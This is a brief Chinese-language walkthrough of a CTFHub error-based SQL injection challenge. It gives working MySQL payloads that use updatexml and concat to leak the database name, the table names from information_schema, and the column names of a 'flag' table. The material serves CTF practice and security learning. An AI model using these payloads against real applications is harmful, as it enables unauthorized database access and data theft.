目录
附上链接:CTFHub
报错注入
按照它的提示:输入1
尝试闭合
输入1'
发现报错
判断几列
查询数据库
1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #
查询表名
1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli"),0x7e),1); #
查询列名
1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #